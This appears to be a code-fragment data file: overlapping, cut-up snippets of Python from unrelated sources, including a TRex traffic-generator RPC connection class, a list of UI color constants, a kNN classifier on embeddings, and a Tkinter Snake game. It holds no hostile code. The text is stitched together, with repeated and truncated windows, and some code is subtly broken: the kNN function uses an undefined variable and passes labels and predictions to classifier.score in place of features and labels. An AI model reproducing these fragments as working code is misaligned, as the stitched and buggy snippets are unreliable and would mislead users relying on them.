"None, retry = 0): return self.rpc_link.invoke_rpc_method(method_name, params, self.api_h, retry = retry) def transmit_batch(self,",
"self.rpc.transmit(\"api_sync_v2\", params = self.api_ver) self.logger.post_cmd(rc) if not rc: # api_sync_v2 is not present",
"from .trex_stl_async_client import CTRexAsyncClient import time import signal import os ############################ RPC layer",
"async barrier is guaranteed ''' return self.async.barrier() def sync (self): ''' fully sync",
"def connect(self): return self.rpc_link.connect() def disconnect(self): self.api_h = None return self.rpc_link.disconnect() def transmit(self,",
"done ''' return self.async.barrier(baseline = True) def mark_for_disconnect (self, cause): ''' A multithread",
"it to the RPC channel from now on self.rpc.api_h = rc.data()['api_h'] # connect",
"import os ############################ RPC layer ############################# ############################ ############################# ############################ ############################# class CCommLink(object): \"\"\"Describes",
"connect (self): ''' connect to the server (two channels) ''' # first disconnect",
"try: self.rpc.disconnect() self.async.disconnect() finally: self.state = (self.DISCONNECTED, None) def connect (self): ''' connect",
"def transmit_batch(self, batch_list, retry = 0): batch = self.rpc_link.create_batch() for command in batch_list:",
"CCommLink(object): \"\"\"Describes the connectivity of the stateless client method\"\"\" def __init__(self, server=\"localhost\", port=5050,",
"server (two channels) ''' # start with the sync channel self.logger.pre_cmd(\"Connecting to RPC",
"case of connection lost ''' self.sigint_on_conn_lost = False def is_alive (self): ''' return",
"the main thread ''' self.sigint_on_conn_lost = True def sigint_on_conn_lost_disable (self): ''' disable SIGINT",
"not rc: # api_sync_v2 is not present in v2.30 and older if rc.errno()",
"self.rpc.api_h = rc.data()['api_h'] # connect async channel self.logger.pre_cmd(\"Connecting to publisher server on {0}:{1}\".format(self.conn_info['server'],",
"def get_disconnection_cause (self): return self.state[1] ########## private ################ def __connect (self): ''' connect",
"def mark_for_disconnect (self, cause): ''' A multithread safe call any thread can mark",
"stop what it's doing and report an error if self.sigint_on_conn_lost: os.kill(os.getpid(), signal.SIGINT) def",
"def is_connected (self): return (self.state[0] == self.CONNECTED) def is_marked_for_disconnect (self): return self.state[0] ==",
"= {'name': 'STL', 'major': 4, 'minor': 1} # low level RPC layer self.rpc",
"in batch_list: batch.add(command.method, command.params, self.api_h) # invoke the batch return batch.invoke(retry = retry)",
"self.async.last_data_recv_ts is not None and ((time.time() - self.async.last_data_recv_ts) <= 3) ) def is_connected",
"# avoid any messages handling for the async thread self.async.set_as_zombie() # change state",
"call any thread can mark the current connection as not valid and will",
"for disconnection ''' DISCONNECTED = 1 CONNECTED = 2 MARK_FOR_DISCONNECT = 3 def",
"self.async.disconnect() finally: self.state = (self.DISCONNECTED, None) def connect (self): ''' connect to the",
"thread can mark the current connection as not valid and will require the",
"rc: return rc # API sync V2 rc = self.rpc.transmit(\"api_sync_v2\", params = self.api_ver)",
"RPC server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['sync_port'])) rc = self.rpc.connect() if not rc: return rc",
"self.conn_info['virtual'], client) self.async = CTRexAsyncClient(self.conn_info['server'], self.conn_info['async_port'], client) # save pointers self.conn_info = conn_info",
"(self.MARK_FOR_DISCONNECT, cause) # if the flag is on, a SIGINT will be sent",
"called after all the config was done ''' return self.async.barrier(baseline = True) def",
"be sent to the main thread ''' self.sigint_on_conn_lost = True def sigint_on_conn_lost_disable (self):",
"CTRexAsyncClient(self.conn_info['server'], self.conn_info['async_port'], client) # save pointers self.conn_info = conn_info # init state self.state",
"return self.rpc_link.disconnect() def transmit(self, method_name, params = None, retry = 0): return self.rpc_link.invoke_rpc_method(method_name,",
"self.sigint_on_conn_lost = False # API classes self.api_ver = {'name': 'STL', 'major': 4, 'minor':",
"from .trex_stl_jsonrpc_client import JsonRpcClient, BatchMessage, ErrNo as JsonRpcErrNo from .trex_stl_async_client import CTRexAsyncClient import",
"''' DISCONNECTED = 1 CONNECTED = 2 MARK_FOR_DISCONNECT = 3 def __init__ (self,",
"''' connect to the server (two channels) ''' # start with the sync",
"(self.DISCONNECTED, None) def disconnect (self): ''' disconnect from both channels sync and async",
"barrier is guaranteed ''' return self.async.barrier() def sync (self): ''' fully sync the",
"disconnect if already connected if self.is_connected(): self.disconnect() # connect rc = self.__connect() if",
"import * from .trex_stl_jsonrpc_client import JsonRpcClient, BatchMessage, ErrNo as JsonRpcErrNo from .trex_stl_async_client import",
"self.async.last_data_recv_ts) <= 3) ) def is_connected (self): return (self.state[0] == self.CONNECTED) def is_marked_for_disconnect",
"client with the server must be called after all the config was done",
"= rc.data()['api_h'] # connect async channel self.logger.pre_cmd(\"Connecting to publisher server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['async_port']))",
"connect(self): return self.rpc_link.connect() def disconnect(self): self.api_h = None return self.rpc_link.disconnect() def transmit(self, method_name,",
"stateless client method\"\"\" def __init__(self, server=\"localhost\", port=5050, virtual=False, client = None): self.server =",
"arrived the server in the last 3 seconds ''' return ( self.async.last_data_recv_ts is",
"None def get_server (self): return self.server def get_port (self): return self.port def connect(self):",
"messages handling for the async thread self.async.set_as_zombie() # change state self.state = (self.MARK_FOR_DISCONNECT,",
"def transmit(self, method_name, params = None, retry = 0): return self.rpc_link.invoke_rpc_method(method_name, params, self.api_h,",
"def __init__ (self, conn_info, logger, client): self.conn_info = conn_info self.logger = logger self.sigint_on_conn_lost",
"if not rc: self.disconnect() return rc def barrier (self): ''' executes a barrier",
"= self.rpc.transmit(\"api_sync_v2\", params = self.api_ver) self.logger.post_cmd(rc) if not rc: # api_sync_v2 is not",
"for command in batch_list: batch.add(command.method, command.params, self.api_h) # invoke the batch return batch.invoke(retry",
"mark the current connection as not valid and will require the main thread",
"client): self.conn_info = conn_info self.logger = logger self.sigint_on_conn_lost = False # API classes",
"def sync (self): ''' fully sync the client with the server must be",
"# change state self.state = (self.MARK_FOR_DISCONNECT, cause) # if the flag is on,",
"def sigint_on_conn_lost_disable (self): ''' disable SIGINT dispatching on case of connection lost '''",
"CCommLink(self.conn_info['server'], self.conn_info['sync_port'], self.conn_info['virtual'], client) self.async = CTRexAsyncClient(self.conn_info['server'], self.conn_info['async_port'], client) # save pointers self.conn_info",
"all the config was done ''' return self.async.barrier(baseline = True) def mark_for_disconnect (self,",
"and report an error if self.sigint_on_conn_lost: os.kill(os.getpid(), signal.SIGINT) def sigint_on_conn_lost_enable (self): ''' when",
"server self.api_h = None def get_server (self): return self.server def get_port (self): return",
"= None return self.rpc_link.disconnect() def transmit(self, method_name, params = None, retry = 0):",
"RC_ERR('Mismatch between client and server versions') return rc # get the API_H and",
"to stop what it's doing and report an error if self.sigint_on_conn_lost: os.kill(os.getpid(), signal.SIGINT)",
"lost a SIGINT will be sent to the main thread ''' self.sigint_on_conn_lost =",
"= 1 CONNECTED = 2 MARK_FOR_DISCONNECT = 3 def __init__ (self, conn_info, logger,",
"self.sigint_on_conn_lost = True def sigint_on_conn_lost_disable (self): ''' disable SIGINT dispatching on case of",
"return (self.state[0] == self.CONNECTED) def is_marked_for_disconnect (self): return self.state[0] == self.MARK_FOR_DISCONNECT def get_disconnection_cause",
"RPC layer self.rpc = CCommLink(self.conn_info['server'], self.conn_info['sync_port'], self.conn_info['virtual'], client) self.async = CTRexAsyncClient(self.conn_info['server'], self.conn_info['async_port'], client)",
"''' connect to the server (two channels) ''' # first disconnect if already",
"for the async thread self.async.set_as_zombie() # change state self.state = (self.MARK_FOR_DISCONNECT, cause) #",
"0): batch = self.rpc_link.create_batch() for command in batch_list: batch.add(command.method, command.params, self.api_h) # invoke",
"is_marked_for_disconnect (self): return self.state[0] == self.MARK_FOR_DISCONNECT def get_disconnection_cause (self): return self.state[1] ########## private",
"= port self.rpc_link = JsonRpcClient(self.server, self.port, client) # API handler provided by the",
"mark_for_disconnect (self, cause): ''' A multithread safe call any thread can mark the",
"is not None and ((time.time() - self.async.last_data_recv_ts) <= 3) ) def is_connected (self):",
"(self): ''' connect to the server (two channels) ''' # start with the",
"server versions') return rc # get the API_H and provide it to the",
"(self): return self.state[0] == self.MARK_FOR_DISCONNECT def get_disconnection_cause (self): return self.state[1] ########## private ################",
"(two channels) ''' # start with the sync channel self.logger.pre_cmd(\"Connecting to RPC server",
"None): self.server = server self.port = port self.rpc_link = JsonRpcClient(self.server, self.port, client) #",
"older if rc.errno() == JsonRpcErrNo.MethodNotSupported: return RC_ERR('Mismatch between client and server versions') return",
"self.api_h = None return self.rpc_link.disconnect() def transmit(self, method_name, params = None, retry =",
"class Connection(object): ''' Manages that connection to the server connection state object describes",
"DISCONNECTED = 1 CONNECTED = 2 MARK_FOR_DISCONNECT = 3 def __init__ (self, conn_info,",
"connectivity of the stateless client method\"\"\" def __init__(self, server=\"localhost\", port=5050, virtual=False, client =",
"self.conn_info = conn_info self.logger = logger self.sigint_on_conn_lost = False # API classes self.api_ver",
"RPC to stop what it's doing and report an error if self.sigint_on_conn_lost: os.kill(os.getpid(),",
"to the main thread ''' self.sigint_on_conn_lost = True def sigint_on_conn_lost_disable (self): ''' disable",
"SIGINT will be sent to the main thread ''' self.sigint_on_conn_lost = True def",
"= (self.DISCONNECTED, None) def connect (self): ''' connect to the server (two channels)",
"the ZMQ RPC to stop what it's doing and report an error if",
"None) def connect (self): ''' connect to the server (two channels) ''' #",
"- self.async.last_data_recv_ts) <= 3) ) def is_connected (self): return (self.state[0] == self.CONNECTED) def",
"sigint_on_conn_lost_disable (self): ''' disable SIGINT dispatching on case of connection lost ''' self.sigint_on_conn_lost",
"the API_H and provide it to the RPC channel from now on self.rpc.api_h",
"method\"\"\" def __init__(self, server=\"localhost\", port=5050, virtual=False, client = None): self.server = server self.port",
"RPC layer ############################# ############################ ############################# ############################ ############################# class CCommLink(object): \"\"\"Describes the connectivity of",
"with the server must be called after all the config was done '''",
"self.api_h) # invoke the batch return batch.invoke(retry = retry) class Connection(object): ''' Manages",
"# get the API_H and provide it to the RPC channel from now",
"object describes the connection to the server state can be either fully disconnected,",
"None and ((time.time() - self.async.last_data_recv_ts) <= 3) ) def is_connected (self): return (self.state[0]",
"client = None): self.server = server self.port = port self.rpc_link = JsonRpcClient(self.server, self.port,",
"def is_marked_for_disconnect (self): return self.state[0] == self.MARK_FOR_DISCONNECT def get_disconnection_cause (self): return self.state[1] ##########",
"time import signal import os ############################ RPC layer ############################# ############################ ############################# ############################ #############################",
"= CTRexAsyncClient(self.conn_info['server'], self.conn_info['async_port'], client) # save pointers self.conn_info = conn_info # init state",
"last 3 seconds ''' return ( self.async.last_data_recv_ts is not None and ((time.time() -",
"JsonRpcClient(self.server, self.port, client) # API handler provided by the server self.api_h = None",
"True def sigint_on_conn_lost_disable (self): ''' disable SIGINT dispatching on case of connection lost",
"= None, retry = 0): return self.rpc_link.invoke_rpc_method(method_name, params, self.api_h, retry = retry) def",
"(self): return self.state[1] ########## private ################ def __connect (self): ''' connect to the"
] |
[
"# default color primary = '#007bff' secondary = '#6c757d' success = '#28a745' danger",
"= '#e0a800' active_info = '#138496' active_light = '#e2e6ea' active_dark = '#23272b' active_white =",
"'#17a2b8' light = '#f8f9fa' dark = '#343a40' white = '#ffffff' black = '#212529'",
"color active_primary = '#0069d9' active_secondary = '#5a6268' active_success = '#218838' active_danger = '#c82333'",
"# active color active_primary = '#0069d9' active_secondary = '#5a6268' active_success = '#218838' active_danger",
"active_danger = '#c82333' active_warning = '#e0a800' active_info = '#138496' active_light = '#e2e6ea' active_dark",
"'#c82333' active_warning = '#e0a800' active_info = '#138496' active_light = '#e2e6ea' active_dark = '#23272b'",
"'#28a745' danger = '#dc3545' warning = '#ffc107' info = '#17a2b8' light = '#f8f9fa'",
"'#dc3545' warning = '#ffc107' info = '#17a2b8' light = '#f8f9fa' dark = '#343a40'",
"= '#17a2b8' light = '#f8f9fa' dark = '#343a40' white = '#ffffff' black =",
"= '#6c757d' success = '#28a745' danger = '#dc3545' warning = '#ffc107' info =",
"success = '#28a745' danger = '#dc3545' warning = '#ffc107' info = '#17a2b8' light",
"primary = '#007bff' secondary = '#6c757d' success = '#28a745' danger = '#dc3545' warning",
"secondary = '#6c757d' success = '#28a745' danger = '#dc3545' warning = '#ffc107' info",
"danger = '#dc3545' warning = '#ffc107' info = '#17a2b8' light = '#f8f9fa' dark",
"= '#343a40' white = '#ffffff' black = '#212529' # active color active_primary =",
"white = '#ffffff' black = '#212529' # active color active_primary = '#0069d9' active_secondary",
"= '#ffffff' black = '#212529' # active color active_primary = '#0069d9' active_secondary =",
"warning = '#ffc107' info = '#17a2b8' light = '#f8f9fa' dark = '#343a40' white",
"default color primary = '#007bff' secondary = '#6c757d' success = '#28a745' danger =",
"'#218838' active_danger = '#c82333' active_warning = '#e0a800' active_info = '#138496' active_light = '#e2e6ea'",
"'#f8f9fa' dark = '#343a40' white = '#ffffff' black = '#212529' # active color",
"<gh_stars>1-10 # default color primary = '#007bff' secondary = '#6c757d' success = '#28a745'",
"'#5a6268' active_success = '#218838' active_danger = '#c82333' active_warning = '#e0a800' active_info = '#138496'",
"black = '#212529' # active color active_primary = '#0069d9' active_secondary = '#5a6268' active_success",
"= '#ffc107' info = '#17a2b8' light = '#f8f9fa' dark = '#343a40' white =",
"'#212529' # active color active_primary = '#0069d9' active_secondary = '#5a6268' active_success = '#218838'",
"active_secondary = '#5a6268' active_success = '#218838' active_danger = '#c82333' active_warning = '#e0a800' active_info",
"'#e0a800' active_info = '#138496' active_light = '#e2e6ea' active_dark = '#23272b' active_white = '#ffffff'",
"= '#f8f9fa' dark = '#343a40' white = '#ffffff' black = '#212529' # active",
"= '#28a745' danger = '#dc3545' warning = '#ffc107' info = '#17a2b8' light =",
"= '#c82333' active_warning = '#e0a800' active_info = '#138496' active_light = '#e2e6ea' active_dark =",
"= '#218838' active_danger = '#c82333' active_warning = '#e0a800' active_info = '#138496' active_light =",
"active_warning = '#e0a800' active_info = '#138496' active_light = '#e2e6ea' active_dark = '#23272b' active_white",
"= '#212529' # active color active_primary = '#0069d9' active_secondary = '#5a6268' active_success =",
"dark = '#343a40' white = '#ffffff' black = '#212529' # active color active_primary",
"light = '#f8f9fa' dark = '#343a40' white = '#ffffff' black = '#212529' #",
"info = '#17a2b8' light = '#f8f9fa' dark = '#343a40' white = '#ffffff' black",
"'#0069d9' active_secondary = '#5a6268' active_success = '#218838' active_danger = '#c82333' active_warning = '#e0a800'",
"active_success = '#218838' active_danger = '#c82333' active_warning = '#e0a800' active_info = '#138496' active_light",
"'#6c757d' success = '#28a745' danger = '#dc3545' warning = '#ffc107' info = '#17a2b8'",
"'#343a40' white = '#ffffff' black = '#212529' # active color active_primary = '#0069d9'",
"= '#007bff' secondary = '#6c757d' success = '#28a745' danger = '#dc3545' warning =",
"active color active_primary = '#0069d9' active_secondary = '#5a6268' active_success = '#218838' active_danger =",
"active_primary = '#0069d9' active_secondary = '#5a6268' active_success = '#218838' active_danger = '#c82333' active_warning",
"= '#5a6268' active_success = '#218838' active_danger = '#c82333' active_warning = '#e0a800' active_info =",
"'#ffffff' black = '#212529' # active color active_primary = '#0069d9' active_secondary = '#5a6268'",
"'#ffc107' info = '#17a2b8' light = '#f8f9fa' dark = '#343a40' white = '#ffffff'",
"= '#0069d9' active_secondary = '#5a6268' active_success = '#218838' active_danger = '#c82333' active_warning =",
"color primary = '#007bff' secondary = '#6c757d' success = '#28a745' danger = '#dc3545'",
"= '#dc3545' warning = '#ffc107' info = '#17a2b8' light = '#f8f9fa' dark =",
"'#007bff' secondary = '#6c757d' success = '#28a745' danger = '#dc3545' warning = '#ffc107'"
] |
[
"test_images, test_labels, k=5, distance_metric='mahalanobis', distance_weighting='distance'): # Create training embeddings. train_embeddings = np.array([model.inference(b) for",
"classifier.fit(train_embeddings, train_labels) # Get predictions. test_predictions = classifier.predict(test_embeddings) # Return accuracy of kNN.",
"train_labels) # Get predictions. test_predictions = classifier.predict(test_embeddings) # Return accuracy of kNN. accuracy",
"testing embeddings. test_embeddings = np.array([model.inference(b) for b in testing_images]) test_embeddings = test_embeddings.reshape((-1, model.embedding_size))",
"train_embeddings = np.array([model.inference(b) for b in train_images]) train_embeddings = train_embeddings.reshape((-1, model.embedding_size)) # Create",
"test_embeddings = np.array([model.inference(b) for b in testing_images]) test_embeddings = test_embeddings.reshape((-1, model.embedding_size)) # Train",
"Create testing embeddings. test_embeddings = np.array([model.inference(b) for b in testing_images]) test_embeddings = test_embeddings.reshape((-1,",
"= np.array([model.inference(b) for b in train_images]) train_embeddings = train_embeddings.reshape((-1, model.embedding_size)) # Create testing",
"def classify_from_embeddings(model, train_images, train_labels, test_images, test_labels, k=5, distance_metric='mahalanobis', distance_weighting='distance'): # Create training embeddings.",
"distance_metric='mahalanobis', distance_weighting='distance'): # Create training embeddings. train_embeddings = np.array([model.inference(b) for b in train_images])",
"n_jobs=-1) classifier.fit(train_embeddings, train_labels) # Get predictions. test_predictions = classifier.predict(test_embeddings) # Return accuracy of",
"numpy as np from sklearn.neighbors import KNeighborsClassifier def classify_from_embeddings(model, train_images, train_labels, test_images, test_labels,",
"np.array([model.inference(b) for b in train_images]) train_embeddings = train_embeddings.reshape((-1, model.embedding_size)) # Create testing embeddings.",
"model.embedding_size)) # Train kNN. classifier = KNeighborsClassifier(n_neighbors=k, weights=distance_weighting, algorithm='auto', metric=distance_metric, n_jobs=-1) classifier.fit(train_embeddings, train_labels)",
"from sklearn.neighbors import KNeighborsClassifier def classify_from_embeddings(model, train_images, train_labels, test_images, test_labels, k=5, distance_metric='mahalanobis', distance_weighting='distance'):",
"= KNeighborsClassifier(n_neighbors=k, weights=distance_weighting, algorithm='auto', metric=distance_metric, n_jobs=-1) classifier.fit(train_embeddings, train_labels) # Get predictions. test_predictions =",
"train_images, train_labels, test_images, test_labels, k=5, distance_metric='mahalanobis', distance_weighting='distance'): # Create training embeddings. train_embeddings =",
"training embeddings. train_embeddings = np.array([model.inference(b) for b in train_images]) train_embeddings = train_embeddings.reshape((-1, model.embedding_size))",
"# Create training embeddings. train_embeddings = np.array([model.inference(b) for b in train_images]) train_embeddings =",
"train_images]) train_embeddings = train_embeddings.reshape((-1, model.embedding_size)) # Create testing embeddings. test_embeddings = np.array([model.inference(b) for",
"np from sklearn.neighbors import KNeighborsClassifier def classify_from_embeddings(model, train_images, train_labels, test_images, test_labels, k=5, distance_metric='mahalanobis',",
"as np from sklearn.neighbors import KNeighborsClassifier def classify_from_embeddings(model, train_images, train_labels, test_images, test_labels, k=5,",
"algorithm='auto', metric=distance_metric, n_jobs=-1) classifier.fit(train_embeddings, train_labels) # Get predictions. test_predictions = classifier.predict(test_embeddings) # Return",
"test_embeddings = test_embeddings.reshape((-1, model.embedding_size)) # Train kNN. classifier = KNeighborsClassifier(n_neighbors=k, weights=distance_weighting, algorithm='auto', metric=distance_metric,",
"train_embeddings.reshape((-1, model.embedding_size)) # Create testing embeddings. test_embeddings = np.array([model.inference(b) for b in testing_images])",
"# Create testing embeddings. test_embeddings = np.array([model.inference(b) for b in testing_images]) test_embeddings =",
"test_predictions = classifier.predict(test_embeddings) # Return accuracy of kNN. accuracy = classifier.score(test_labels, test_predictions) return",
"KNeighborsClassifier(n_neighbors=k, weights=distance_weighting, algorithm='auto', metric=distance_metric, n_jobs=-1) classifier.fit(train_embeddings, train_labels) # Get predictions. test_predictions = classifier.predict(test_embeddings)",
"predictions. test_predictions = classifier.predict(test_embeddings) # Return accuracy of kNN. accuracy = classifier.score(test_labels, test_predictions)",
"k=5, distance_metric='mahalanobis', distance_weighting='distance'): # Create training embeddings. train_embeddings = np.array([model.inference(b) for b in",
"train_labels, test_images, test_labels, k=5, distance_metric='mahalanobis', distance_weighting='distance'): # Create training embeddings. train_embeddings = np.array([model.inference(b)",
"KNeighborsClassifier def classify_from_embeddings(model, train_images, train_labels, test_images, test_labels, k=5, distance_metric='mahalanobis', distance_weighting='distance'): # Create training",
"sklearn.neighbors import KNeighborsClassifier def classify_from_embeddings(model, train_images, train_labels, test_images, test_labels, k=5, distance_metric='mahalanobis', distance_weighting='distance'): #",
"model.embedding_size)) # Create testing embeddings. test_embeddings = np.array([model.inference(b) for b in testing_images]) test_embeddings",
"np.array([model.inference(b) for b in testing_images]) test_embeddings = test_embeddings.reshape((-1, model.embedding_size)) # Train kNN. classifier",
"= test_embeddings.reshape((-1, model.embedding_size)) # Train kNN. classifier = KNeighborsClassifier(n_neighbors=k, weights=distance_weighting, algorithm='auto', metric=distance_metric, n_jobs=-1)",
"test_embeddings.reshape((-1, model.embedding_size)) # Train kNN. classifier = KNeighborsClassifier(n_neighbors=k, weights=distance_weighting, algorithm='auto', metric=distance_metric, n_jobs=-1) classifier.fit(train_embeddings,",
"in train_images]) train_embeddings = train_embeddings.reshape((-1, model.embedding_size)) # Create testing embeddings. test_embeddings = np.array([model.inference(b)",
"metric=distance_metric, n_jobs=-1) classifier.fit(train_embeddings, train_labels) # Get predictions. test_predictions = classifier.predict(test_embeddings) # Return accuracy",
"embeddings. train_embeddings = np.array([model.inference(b) for b in train_images]) train_embeddings = train_embeddings.reshape((-1, model.embedding_size)) #",
"weights=distance_weighting, algorithm='auto', metric=distance_metric, n_jobs=-1) classifier.fit(train_embeddings, train_labels) # Get predictions. test_predictions = classifier.predict(test_embeddings) #",
"kNN. classifier = KNeighborsClassifier(n_neighbors=k, weights=distance_weighting, algorithm='auto', metric=distance_metric, n_jobs=-1) classifier.fit(train_embeddings, train_labels) # Get predictions.",
"distance_weighting='distance'): # Create training embeddings. train_embeddings = np.array([model.inference(b) for b in train_images]) train_embeddings",
"import KNeighborsClassifier def classify_from_embeddings(model, train_images, train_labels, test_images, test_labels, k=5, distance_metric='mahalanobis', distance_weighting='distance'): # Create",
"b in train_images]) train_embeddings = train_embeddings.reshape((-1, model.embedding_size)) # Create testing embeddings. test_embeddings =",
"in testing_images]) test_embeddings = test_embeddings.reshape((-1, model.embedding_size)) # Train kNN. classifier = KNeighborsClassifier(n_neighbors=k, weights=distance_weighting,",
"classify_from_embeddings(model, train_images, train_labels, test_images, test_labels, k=5, distance_metric='mahalanobis', distance_weighting='distance'): # Create training embeddings. train_embeddings",
"= classifier.predict(test_embeddings) # Return accuracy of kNN. accuracy = classifier.score(test_labels, test_predictions) return accuracy",
"train_embeddings = train_embeddings.reshape((-1, model.embedding_size)) # Create testing embeddings. test_embeddings = np.array([model.inference(b) for b",
"= np.array([model.inference(b) for b in testing_images]) test_embeddings = test_embeddings.reshape((-1, model.embedding_size)) # Train kNN.",
"for b in testing_images]) test_embeddings = test_embeddings.reshape((-1, model.embedding_size)) # Train kNN. classifier =",
"b in testing_images]) test_embeddings = test_embeddings.reshape((-1, model.embedding_size)) # Train kNN. classifier = KNeighborsClassifier(n_neighbors=k,",
"testing_images]) test_embeddings = test_embeddings.reshape((-1, model.embedding_size)) # Train kNN. classifier = KNeighborsClassifier(n_neighbors=k, weights=distance_weighting, algorithm='auto',",
"Get predictions. test_predictions = classifier.predict(test_embeddings) # Return accuracy of kNN. accuracy = classifier.score(test_labels,",
"= train_embeddings.reshape((-1, model.embedding_size)) # Create testing embeddings. test_embeddings = np.array([model.inference(b) for b in",
"# Train kNN. classifier = KNeighborsClassifier(n_neighbors=k, weights=distance_weighting, algorithm='auto', metric=distance_metric, n_jobs=-1) classifier.fit(train_embeddings, train_labels) #",
"for b in train_images]) train_embeddings = train_embeddings.reshape((-1, model.embedding_size)) # Create testing embeddings. test_embeddings",
"# Get predictions. test_predictions = classifier.predict(test_embeddings) # Return accuracy of kNN. accuracy =",
"import numpy as np from sklearn.neighbors import KNeighborsClassifier def classify_from_embeddings(model, train_images, train_labels, test_images,",
"Train kNN. classifier = KNeighborsClassifier(n_neighbors=k, weights=distance_weighting, algorithm='auto', metric=distance_metric, n_jobs=-1) classifier.fit(train_embeddings, train_labels) # Get",
"classifier = KNeighborsClassifier(n_neighbors=k, weights=distance_weighting, algorithm='auto', metric=distance_metric, n_jobs=-1) classifier.fit(train_embeddings, train_labels) # Get predictions. test_predictions",
"Create training embeddings. train_embeddings = np.array([model.inference(b) for b in train_images]) train_embeddings = train_embeddings.reshape((-1,",
"embeddings. test_embeddings = np.array([model.inference(b) for b in testing_images]) test_embeddings = test_embeddings.reshape((-1, model.embedding_size)) #",
"test_labels, k=5, distance_metric='mahalanobis', distance_weighting='distance'): # Create training embeddings. train_embeddings = np.array([model.inference(b) for b"
] |
[
"random.randint(1, (WIDTH-SEG_SIZE) / SEG_SIZE) posy = SEG_SIZE * random.randint(1, (HEIGHT-SEG_SIZE) / SEG_SIZE) BLOCK",
"Canvas import random # Globals WIDTH = 800 HEIGHT = 600 SEG_SIZE =",
"start_game(): global s create_block() s = create_snake() # Reaction on keypress c.bind(\"<KeyPress>\", s.change_direction)",
"= Tk() root.title(\"PythonicWay Snake\") c = Canvas(root, width=WIDTH, height=HEIGHT, bg=\"#003300\") c.grid() # catch",
"[Segment(SEG_SIZE, SEG_SIZE), Segment(SEG_SIZE*2, SEG_SIZE), Segment(SEG_SIZE*3, SEG_SIZE)] return Snake(segments) # Setting up window root",
"snake segments = [Segment(SEG_SIZE, SEG_SIZE), Segment(SEG_SIZE*2, SEG_SIZE), Segment(SEG_SIZE*3, SEG_SIZE)] return Snake(segments) # Setting",
"= segments # possible moves self.mapping = {\"Down\": (0, 1), \"Right\": (1, 0),",
"segments = [Segment(SEG_SIZE, SEG_SIZE), Segment(SEG_SIZE*2, SEG_SIZE), Segment(SEG_SIZE*3, SEG_SIZE)] return Snake(segments) # Setting up",
"add_segment(self): \"\"\" Adds segment to the snake \"\"\" last_seg = c.coords(self.segments[0].instance) x =",
"= c.create_rectangle(x, y, x+SEG_SIZE, y+SEG_SIZE, fill=\"white\") class Snake(object): \"\"\" Simple Snake class \"\"\"",
"c.coords(self.segments[0].instance) x = last_seg[2] - SEG_SIZE y = last_seg[3] - SEG_SIZE self.segments.insert(0, Segment(x,",
"x2+self.vector[0]*SEG_SIZE, y2+self.vector[1]*SEG_SIZE) def add_segment(self): \"\"\" Adds segment to the snake \"\"\" last_seg =",
"gamefield edges if x2 > WIDTH or x1 < 0 or y1 <",
"for index in range(len(self.segments)-1): segment = self.segments[index].instance x1, y1, x2, y2 = c.coords(self.segments[index+1].instance)",
"fill=\"white\") class Snake(object): \"\"\" Simple Snake class \"\"\" def __init__(self, segments): self.segments =",
"= c.create_text(WIDTH/2, HEIGHT/2, text=\"GAME OVER!\", font='Arial 20', fill='red', state='hidden') restart_text = c.create_text(WIDTH/2, HEIGHT-HEIGHT/3,",
"= c.coords(self.segments[0].instance) x = last_seg[2] - SEG_SIZE y = last_seg[3] - SEG_SIZE self.segments.insert(0,",
"# Setting up window root = Tk() root.title(\"PythonicWay Snake\") c = Canvas(root, width=WIDTH,",
"y1, x2, y2 = c.coords(self.segments[index+1].instance) c.coords(segment, x1, y1, x2, y2) x1, y1, x2,",
"c.grid() # catch keypressing c.focus_set() game_over_text = c.create_text(WIDTH/2, HEIGHT/2, text=\"GAME OVER!\", font='Arial 20',",
"self.segments: c.delete(segment.instance) def set_state(item, state): c.itemconfigure(item, state=state) def clicked(event): global IN_GAME s.reset_snake() IN_GAME",
"self.mapping[\"Right\"] def move(self): \"\"\" Moves the snake with the specified vector\"\"\" for index",
"c.delete(segment.instance) def set_state(item, state): c.itemconfigure(item, state=state) def clicked(event): global IN_GAME s.reset_snake() IN_GAME =",
"x1, y1, x2, y2 = c.coords(self.segments[index+1].instance) c.coords(segment, x1, y1, x2, y2) x1, y1,",
"= c.coords(self.segments[-2].instance) c.coords(self.segments[-1].instance, x1+self.vector[0]*SEG_SIZE, y1+self.vector[1]*SEG_SIZE, x2+self.vector[0]*SEG_SIZE, y2+self.vector[1]*SEG_SIZE) def add_segment(self): \"\"\" Adds segment to",
"event.keysym in self.mapping: self.vector = self.mapping[event.keysym] def reset_snake(self): for segment in self.segments: c.delete(segment.instance)",
"state='hidden') c.itemconfigure(game_over_text, state='hidden') start_game() def start_game(): global s create_block() s = create_snake() #",
"random # Globals WIDTH = 800 HEIGHT = 600 SEG_SIZE = 20 IN_GAME",
"SEG_SIZE = 20 IN_GAME = True # Helper functions def create_block(): \"\"\" Creates",
"direction self.vector = self.mapping[\"Right\"] def move(self): \"\"\" Moves the snake with the specified",
"segments): self.segments = segments # possible moves self.mapping = {\"Down\": (0, 1), \"Right\":",
"x+SEG_SIZE, y+SEG_SIZE, fill=\"white\") class Snake(object): \"\"\" Simple Snake class \"\"\" def __init__(self, segments):",
"global s create_block() s = create_snake() # Reaction on keypress c.bind(\"<KeyPress>\", s.change_direction) main()",
"c.delete(BLOCK) c.itemconfigure(restart_text, state='hidden') c.itemconfigure(game_over_text, state='hidden') start_game() def start_game(): global s create_block() s =",
"= False root.after(100, main) # Not IN_GAME -> stop game and print message",
"in range(len(s.segments)-1): if head_coords == c.coords(s.segments[index].instance): IN_GAME = False root.after(100, main) # Not",
"y1, x2, y2) x1, y1, x2, y2 = c.coords(self.segments[-2].instance) c.coords(self.segments[-1].instance, x1+self.vector[0]*SEG_SIZE, y1+self.vector[1]*SEG_SIZE, x2+self.vector[0]*SEG_SIZE,",
"HEIGHT-HEIGHT/3, font='Arial 30', fill='white', text=\"Click here to restart\", state='hidden') c.tag_bind(restart_text, \"<Button-1>\", clicked) start_game()",
"c.itemconfigure(restart_text, state='hidden') c.itemconfigure(game_over_text, state='hidden') start_game() def start_game(): global s create_block() s = create_snake()",
"c.coords(self.segments[index+1].instance) c.coords(segment, x1, y1, x2, y2) x1, y1, x2, y2 = c.coords(self.segments[-2].instance) c.coords(self.segments[-1].instance,",
"c.delete(BLOCK) create_block() # Self-eating else: for index in range(len(s.segments)-1): if head_coords == c.coords(s.segments[index].instance):",
"'normal') set_state(game_over_text, 'normal') class Segment(object): \"\"\" Single snake segment \"\"\" def __init__(self, x,",
